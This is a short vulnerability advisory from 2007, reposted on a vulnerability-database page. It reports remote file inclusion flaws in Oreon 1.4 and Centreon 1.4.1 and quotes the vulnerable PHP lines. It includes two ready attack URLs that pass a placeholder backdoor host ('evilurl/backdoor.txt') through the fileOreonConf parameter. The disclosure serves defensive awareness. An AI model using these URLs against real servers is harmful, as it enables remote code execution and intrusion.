Vulners
Lucene search
Oreon 1.4 / Centreon 1.4.1 Multiple RFI Vulnerabilties
======================================================
Oreon 1.4 / Centreon 1.4.1 Multiple RFI Vulnerabilties
======================================================
By Michael Brooks
Vulnerability Type: Multiple Remote File Inclusion.
Software: Oreon and Centreon
Homepage:http://www.oreon-project.org/ or http://www.centreon.com/
Versions: 1.4(Oreon) and 1.4.1(Centreon)
The vulnerable file is:
./oreon-1.4/www/include/monitoring/engine/MakeXML.php
Another,virtually identical RFI:
./oreon-1.4/www/include/monitoring/engine/MakeXML4statusCounter.php
The attack:
http://127.0.0.1/include/monitoring/engine/MakeXML.php?fileOreonConf=http://evilurl/backdoor.txt?
or
http://127.0.0.1/include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://evilurl/backdoor.txt?
file MakeXML.php line 42 & 43:
include_once($oreonPath . "www/oreon.conf.php");
include_once($oreonPath . "www/include/common/common-Func-ACL.php");
Register_globals isn't needed for the taint:
file MakeXML.php line 28:
if (isset($_GET["fileOreonConf"]))
$oreonPath = $_GET["fileOreonConf"];
However magic_quotes_gpc is require for LFI because you need a null byte.
Peace
# 0day.today [2018-02-19] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
14 Dec 2007 00:00Current
7.1High risk
Vulners AI Score7.1